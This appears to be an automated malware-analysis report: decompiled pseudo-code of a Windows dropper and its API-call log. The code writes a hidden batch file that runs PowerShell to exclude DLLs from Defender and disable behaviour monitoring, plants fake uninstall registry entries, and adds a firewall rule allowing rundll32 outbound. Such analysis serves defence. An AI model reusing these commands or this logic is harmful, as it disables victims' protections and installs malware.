				 *((intOrPtr*)(_t44 + 0x2d)) =  *((intOrPtr*)(_t44 + 0x2d)) - 3;
				E004028D0(_t143, _t145);
				 *0x4433c3(0, 0x1a, 0, 0, "C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91"); // executed
				lstrcatA("C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91", "\\IDFcan");
				CreateDirectoryA("C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91", 0); // executed
				asm("repne scasb");
				memcpy(0x443411, "\\jdfddn.dll", 0xd);
				_t185 = _t178;
				_push(_t185);
				asm("repne scasb");
				_push(0);
				asm("pushad");
				lstrcpyA("C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll", "C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91");
				asm("popad");
				memcpy("ft\\Windows\\CurrentVersion\\Run", 0x43cdef, 0x10);
				asm("pushad");
				_t58 = GetModuleHandleA("kernel32");
				if(_t58 == 0) {
					L56:
					Sleep(0x1388); // executed
					GetTempPathA(0x1f4, "C:\Users\jones\AppData\Local\Temp\oh161a161.bat");
					lstrcatA("C:\Users\jones\AppData\Local\Temp\oh161a161.bat", "oh161a161.bat");
					_t61 = DeleteFileA("C:\Users\jones\AppData\Local\Temp\oh161a161.bat"); // executed
					asm("popad");
					CloseHandle(E004024B7(_t61));
					 *((intOrPtr*)(0x1a + "ft\\Windows\\CurrentVersion\\Run")) = 0xc7bed139;
					 *((intOrPtr*)(0x1a + "ft\\Windows\\CurrentVersion\\Run")) =  *((intOrPtr*)(0x1a + "ft\\Windows\\CurrentVersion\\Run")) + 0x38afa419;
					 *0x443404 = 0x646e7572;
					 *0x443408 = 0x32336c6c;
					 *0x44340c = 0x6578652e;
					 *0x443410 = 0x2220;
					asm("repne scasb");
					_push(0x443404);
					 *0x00443403 = 0x21;
					 *((char*)(0x443403)) =  *((char*)(0x443403)) + 1;
					 *0x443404 = 0xfffffffffffffffd;
					_t210 = "jdfddn";
					memcpy(0x443405, _t210, 6);
					asm("stosb");
					if( *0x43f5a1 == 0) {
						lstrcpyA("C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe", "C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91");
						_t112 = lstrlenA("C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe");
						asm("std");
						asm("repne scasb");
						 *((char*)(0x444bb4 + _t112 + 1)) = 0;
						asm("cld");
						 *0x446364 = 0x22;
						lstrcpyA("C:\Users\jones\AppData\Roaming\IDFcan\miakhad.dll",xpi", "C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe");
						lstrcatA("C:\Users\jones\AppData\Roaming\IDFcan\miakhad.dll",xpi", "\\miakhad.dll");
						lstrcatA("C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe", "\\2707952b-6f11-481e-99be-b28317af8e3d.exe");
						lstrlenA("C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe");
					}
					lstrcatA("C:\Users\jones\AppData\Roaming\IDFcan\miakhad.dll",xpi", "\",xpi");
					GetModuleFileNameA(0, 0x447f63, 0x258);
					Sleep(0xbb8); // executed
					if( *0x43f5c2 == 0) {
						Sleep(0x9c4);
					}
					if( *0x43f5c2 == 0) {
						Sleep(0x9c4);
					}
					if( *0x43f5c2 == 0) {
						Sleep(0x9c4);
					}
					if( *0x43f5c2 == 0) {
						Sleep(0x9c4);
					}
					if( *0x43f5c2 == 0) {
						Sleep(0x9c4);
					}
					if( *0x43f5c2 == 0) {
						Sleep(0x157c);
					}
					lstrcpyA(0x447793, ""C:\Users\jones\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91");
					 *0x447f62 = 0x20;
					lstrcatA(0x447793, 0x447f62);
					0x44722b->cbSize = 0x3c;
					 *0x0044722F = 0x40;
					 *0x443410 = 0;
					 *0x43f5e3 = 0x6e65706f;
					 *0x43f5e7 = 0;
					 *0x00447237 = 0x43f5e3;
					 *0x0044723B = 0x443404;
					 *0x0044723F = 0x447793;
					ShellExecuteExA(0x44722b); // executed
					 *0x443410 = 0x20;
					while( *0x43f5c2 == 0) {
						Sleep(0x3e8);
					}
					L74:
					while(1) {
						if(OpenMutexA(0x100000, 0,  &M0043E104) == 0) {
							L81:
							Sleep(0x1f4); // executed
							continue;
						}
						if( *0x440250 == 4) {
							RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\2707952b-6f11-481e-99be-b28317af8e3d", 0, 0, 0, 0xf003f, 0, 0x4433fc, 0x443400);
							E0040247D("DisplayName", 1, "2707952b-6f11-481e-99be-b28317af8e3d", lstrlenA("2707952b-6f11-481e-99be-b28317af8e3d"));
							E0040247D("UninstallString", 1, "C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe", lstrlenA("C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe"));
							E0040247D("Publisher", 1, "South Editor Ltd.", lstrlenA("South Editor Ltd."));
							RegCloseKey( *0x4433fc);
						}
						RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{4864a531-7c66-4f8b-8bca-339fdcb93393}", 0, 0, 0, 0xf003f, 0, 0x4433fc, 0x443400); // executed
						E0040247D("DisplayName", 1, "{4864a531-7c66-4f8b-8bca-339fdcb93393}", lstrlenA("{4864a531-7c66-4f8b-8bca-339fdcb93393}")); // executed
						E0040247D("UninstallString", 1, "C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe", lstrlenA("C:\Users\jones\AppData\Roaming\IDFcan\2707952b-6f11-481e-99be-b28317af8e3d.exe")); // executed
						E0040247D("Publisher", 1, "South Editor Ltd.", lstrlenA("South Editor Ltd.")); // executed
						RegCloseKey( *0x4433fc);
						RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{de2c9435-807b-4ef9-84e9-24af9a832065}", 0, 0, 0, 0xf003f, 0, 0x4433fc, 0x443400); // executed
						RegCloseKey( *0x4433fc);
						GetTickCount();
						_t174 =  *0x449abb;
						E00402AD2();
						lstrcatA("rundll32.exe", " 6i/91");
						_t97 = E0040247D( &M0043FA86, 1, "rundll32.exe", lstrlenA("rundll32.exe")); // executed
						if(_t97 != 0) {
							 *0x43f5a1 = 1;
						}
						RegCloseKey( *0x4433fc);
						if( *0x43f5a1 != 1) {
							GetModuleFileNameA(0, 0x44039c, 0x258);
							 *0x443410 = 0;
							 *0x00447277 = 0x44039c;
							 *((intOrPtr*)(0x44727b)) = "setupqqadvfirewall firewall add rule name=\"Rundll32\" dir=out action=allow protocol=any program=\"C:\\Windows\\system32\\rundll32.exe\"";
							ExitProcess(); // executed
							CreateFileA(0x447267, 0xc0000000, 3, 0, 0x447793, 0x80, 0); // executed
							goto __edx;
						} else {
							ExitProcess();
							 *_t210 =  *_t210 & _t174;
							asm("punpckhbw mm6, mm4");
							goto L81;
						}
					}
				} else {
					_t119 = GetProcAddress(_t58, "IsWow64Process");
					if(_t119 == 0 || _t119 == 0xffffffff) {
						goto L56;
					} else {
						_t120 = GetCurrentProcess();
						 *_t119(_t120, 0x440254);
						if(( *0x440254 & 0x000000ff) != 1) {
							goto L56;
						} else {
							_t123 = GetTempPathA(0x1f4, "C:\Users\jones\AppData\Local\Temp\oh161a161.bat");
							_t212 = 0x44021e;
							_t162 = 9;
							goto L7;
							L53:
							 *_t212 = _t144;
							_t212 = _t212 + 1;
							asm("stosb");
							_t162 = _t162 - 1;
							if(_t162 != 0) {
								L7:
								asm("rdtsc");
								_t177 = _t123 & 0x000000ff;
								if(_t177 <= 0 || _t177 >= 0x10) {
									if(_t177 <= 0xf || _t177 >= 0x20) {
										if(_t177 <= 0x1f || _t177 >= 0x30) {
											if(_t177 <= 0x2f || _t177 >= 0x40) {
												if(_t177 <= 0x3f || _t177 >= 0x50) {
													if(_t177 <= 0x4f || _t177 >= 0x60) {
														if(_t177 <= 0x5f || _t177 >= 0x70) {
															if(_t177 <= 0x6f || _t177 >= 0x80) {
																if(_t177 <= 0x7f || _t177 >= 0x90) {
																	if(_t177 <= 0x8f || _t177 >= 0xa0) {
																		if(_t177 <= 0x9f || _t177 >= 0xb0) {
																			if(_t177 <= 0xaf || _t177 >= 0xc0) {
																				if(_t177 <= 0xbf || _t177 >= 0xd0) {
																					if(_t177 <= 0xcf || _t177 >= 0xe0) {
																						if(_t177 <= 0xdf || _t177 >= 0xf0) {
																							_t123 = 0x72;
																							_t144 = 0x31;
																						} else {
																							_t123 = 0x70;
																							_t144 = 0x63;
																						}
																					} else {
																						_t123 = 0x69;
																						_t144 = 0x6c;
																					}
																				} else {
																					_t123 = 0x61;
																					_t144 = 0x77;
																				}
																			} else {
																				_t123 = 0x65;
																				_t144 = 0x61;
																			}
																		} else {
																			_t123 = 0x73;
																			_t144 = 0x68;
																		}
																	} else {
																		_t123 = 0x66;
																		_t144 = 0x6a;
																	}
																} else {
																	_t123 = 0x39;
																	_t144 = 0x74;
																}
															} else {
																_t123 = 0x38;
																_t144 = 0x31;
															}
														} else {
															_t123 = 0x37;
															_t144 = 0x6f;
														}
													} else {
														_t123 = 0x36;
														_t144 = 0x72;
													}
												} else {
													_t123 = 0x35;
													_t144 = 0x67;
												}
											} else {
												_t123 = 0x34;
												_t144 = 0x36;
											}
										} else {
											_t123 = 0x33;
											_t144 = 0x34;
										}
									} else {
										_t123 = 0x32;
										_t144 = 0x33;
									}
								} else {
									_t123 = 0x31;
									_t144 = 0x32;
								}
								goto L53;
							} else {
								lstrcatA("C:\Users\jones\AppData\Local\Temp\oh161a161.bat", "7sr48er48");
								lstrcatA("C:\Users\jones\AppData\Local\Temp\oh161a161.bat", ".bat");
								lstrcatA("oh161a161.bat", ".bat");
								lstrcpyA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "echo timeout 3 > ");
								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "oh161a161.bat");
								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "\r\necho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ");
								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "oh161a161.bat");
								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "\r\necho exit >> ");
								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "oh161a161.bat");
								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "\r\nstart /min ");
								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "oh161a161.bat");
								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "\r\n");
								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "C:\Users\jones\AppData\Local\Temp\oh161a161.bat");
								 *0x43f703 = 0;
								lstrcatA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te", "\"\r\n");
								if(0 != 0) {
									_push(0);
									_push(lstrlenA("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te"));
									_push("echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\jones\AppData\Local\Te");
									L0043C844();
									CloseHandle(0);
									0x44722b->cbSize = 0x3c;
									 *((intOrPtr*)(0x44722f)) = 0x40;
									 *0x43f5e3 = 0x6e65706f;
									 *0x43f5e7 = 0;
									 *((intOrPtr*)(0x447237)) = 0x43f5e3;
									 *((intOrPtr*)(0x44723b)) = 0x43fc10;
									 *0x0044723F = 0;
									 *0x00447247 = 0;
									ShellExecuteExA(0x44722b);
								}
								goto L56;
							}
						}
					}
				}
			}






















                                                                0x00401b71
                                                                0x00401b76
                                                                0x00401b7a
                                                                0x00401b7d
                                                                0x00401b80
                                                                0x00401b82
                                                                0x00401b85
                                                                0x00401b88
                                                                0x00401b8b
                                                                0x00401b8e
                                                                0x00401b91
                                                                0x00401b94
                                                                0x00401b9b
                                                                0x00401b9f
                                                                0x00401bb1
                                                                0x00401bc1
                                                                0x00401bcd
                                                                0x00401be3
                                                                0x00401bfc
                                                                0x00401c01
                                                                0x00401c03
                                                                0x00401c13
                                                                0x00401c1b
                                                                0x00401c1c
                                                                0x00401c27
                                                                0x00401c2c
                                                                0x00401c48
                                                                0x00401c4a
                                                                0x00401ca9
                                                                0x00401cab
                                                                0x00401fa5
                                                                0x00401faa
                                                                0x00401fb9
                                                                0x00401fc8
                                                                0x00401fd2
                                                                0x00401fd7
                                                                0x00401fde
                                                                0x00401fe9
                                                                0x00401ff3
                                                                0x00401ffd
                                                                0x00402007
                                                                0x00402011
                                                                0x0040201b
                                                                0x00402032
                                                                0x00402035
                                                                0x00402036
                                                                0x0040203a
                                                                0x00402043
                                                                0x0040204d
                                                                0x00402059
                                                                0x0040205b
                                                                0x0040206c
                                                                0x00402078
                                                                0x00402082
                                                                0x0040208e
                                                                0x00402099
                                                                0x0040209b
                                                                0x0040209f
                                                                0x004020a0
                                                                0x004020b1
                                                                0x004020c0
                                                                0x004020cf
                                                                0x004020d9
                                                                0x004020d9
                                                                0x004020e8
                                                                0x004020fb
                                                                0x00402106
                                                                0x00402112
                                                                0x00402119
                                                                0x00402119
                                                                0x00402125
                                                                0x0040212c
                                                                0x0040212c
                                                                0x00402138
                                                                0x0040213f
                                                                0x0040213f
                                                                0x0040214b
                                                                0x00402152
                                                                0x00402152
                                                                0x0040215e
                                                                0x00402165
                                                                0x00402165
                                                                0x00402171
                                                                0x00402178
                                                                0x00402178
                                                                0x00402189
                                                                0x0040218e
                                                                0x004021a3
                                                                0x004021ae
                                                                0x004021b4
                                                                0x004021bb
                                                                0x004021c2
                                                                0x004021cc
                                                                0x004021d3
                                                                0x004021da
                                                                0x004021e1
                                                                0x004021ef
                                                                0x004021f4
                                                                0x00402207
                                                                0x00402202
                                                                0x00402202
                                                                0x00000000
                                                                0x00402212
                                                                0x00402226
                                                                0x004023e5
                                                                0x004023ea
                                                                0x00000000
                                                                0x004023ea
                                                                0x00402233
                                                                0x0040225a
                                                                0x00402276
                                                                0x00402292
                                                                0x004022ae
                                                                0x004022b9
                                                                0x004022b9
                                                                0x004022df
                                                                0x004022fb
                                                                0x00402317
                                                                0x00402333
                                                                0x0040233e
                                                                0x00402364
                                                                0x0040236f
                                                                0x00402374
                                                                0x00402379
                                                                0x00402386
                                                                0x00402396
                                                                0x004023b2
                                                                0x004023b9
                                                                0x004023bb
                                                                0x004023bb
                                                                0x004023c8
                                                                0x004023d5
                                                                0x00402407
                                                                0x0040240c
                                                                0x00402419
                                                                0x00402420
                                                                0x00402449
                                                                0x00402460
                                                                0x00402468
                                                                0x004023d7
                                                                0x004023d7
                                                                0x004023dc
                                                                0x004023e4
                                                                0x00000000
                                                                0x004023e4
                                                                0x004023d5
                                                                0x00401cb1
                                                                0x00401cbc
                                                                0x00401cbe
                                                                0x00000000
                                                                0x00401ccd
                                                                0x00401ccf
                                                                0x00401cda
                                                                0x00401ce6
                                                                0x00000000
                                                                0x00401cec
                                                                0x00401cfd
                                                                0x00401d07
                                                                0x00401d0c
                                                                0x00401d0c
                                                                0x00401e4f
                                                                0x00401e4f
                                                                0x00401e51
                                                                0x00401e52
                                                                0x00401e53
                                                                0x00401e54
                                                                0x00401d11
                                                                0x00401d11
                                                                0x00401d13
                                                                0x00401d19
                                                                0x00401d2c
                                                                0x00401d3f
                                                                0x00401d52
                                                                0x00401d65
                                                                0x00401d78
                                                                0x00401d8b
                                                                0x00401d9e
                                                                0x00401db4
                                                                0x00401dcd
                                                                0x00401de3
                                                                0x00401df9
                                                                0x00401e0f
                                                                0x00401e25
                                                                0x00401e3b
                                                                0x00401e4b
                                                                0x00401e4d
                                                                0x00401e45
                                                                0x00401e45
                                                                0x00401e47
                                                                0x00401e47
                                                                0x00401e2f
                                                                0x00401e2f
                                                                0x00401e31
                                                                0x00401e31
                                                                0x00401e19
                                                                0x00401e19
                                                                0x00401e1b
                                                                0x00401e1b
                                                                0x00401e03
                                                                0x00401e03
                                                                0x00401e05
                                                                0x00401e05
                                                                0x00401ded
                                                                0x00401ded
                                                                0x00401def
                                                                0x00401def
                                                                0x00401dd7
                                                                0x00401dd7
                                                                0x00401dd9
                                                                0x00401dd9
                                                                0x00401dbe
                                                                0x00401dbe
                                                                0x00401dc0
                                                                0x00401dc0
                                                                0x00401da8
                                                                0x00401da8
                                                                0x00401daa
                                                                0x00401daa
                                                                0x00401d92
                                                                0x00401d92
                                                                0x00401d94
                                                                0x00401d94
                                                                0x00401d7f
                                                                0x00401d7f
                                                                0x00401d81
                                                                0x00401d81
                                                                0x00401d6c
                                                                0x00401d6c
                                                                0x00401d6e
                                                                0x00401d6e
                                                                0x00401d59
                                                                0x00401d59
                                                                0x00401d5b
                                                                0x00401d5b
                                                                0x00401d46
                                                                0x00401d46
                                                                0x00401d48
                                                                0x00401d48
                                                                0x00401d33
                                                                0x00401d33
                                                                0x00401d35
                                                                0x00401d35
                                                                0x00401d20
                                                                0x00401d20
                                                                0x00401d22
                                                                0x00401d22
                                                                0x00000000
                                                                0x00401e5a
                                                                0x00401e64
                                                                0x00401e73
                                                                0x00401e82
                                                                0x00401e91
                                                                0x00401ea0
                                                                0x00401eaf
                                                                0x00401ebe
                                                                0x00401ecd
                                                                0x00401edc
                                                                0x00401eeb
                                                                0x00401efa
                                                                0x00401f09
                                                                0x00401f18
                                                                0x00401f1d
                                                                0x00401f2e
                                                                0x00401f3b
                                                                0x00401f3d
                                                                0x00401f4a
                                                                0x00401f4b
                                                                0x00401f51
                                                                0x00401f56
                                                                0x00401f61
                                                                0x00401f67
                                                                0x00401f6e
                                                                0x00401f78
                                                                0x00401f7f
                                                                0x00401f86
                                                                0x00401f8d
                                                                0x00401f94
                                                                0x00401fa0
                                                                0x00401fa0
                                                                0x00000000
                                                                0x00401f3b
                                                                0x00401e54
                                                                0x00401ce6
                                                                0x00401cbe

                                                                APIs
                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 00401BB1
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401BC1
                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401BCD
                                                                • lstrcpyA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401C27
                                                                • GetModuleHandleA.KERNEL32(kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401CA4
                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401CB7
                                                                • GetCurrentProcess.KERNEL32(00000000,IsWow64Process,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401CCF
                                                                • GetTempPathA.KERNEL32(000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401CFD
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401E64
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401E73
                                                                • lstrcatA.KERNEL32(oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401E82
                                                                • lstrcpyA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401E91
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401EA0
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401EAF
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401EBE
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48), ref: 00401ECD
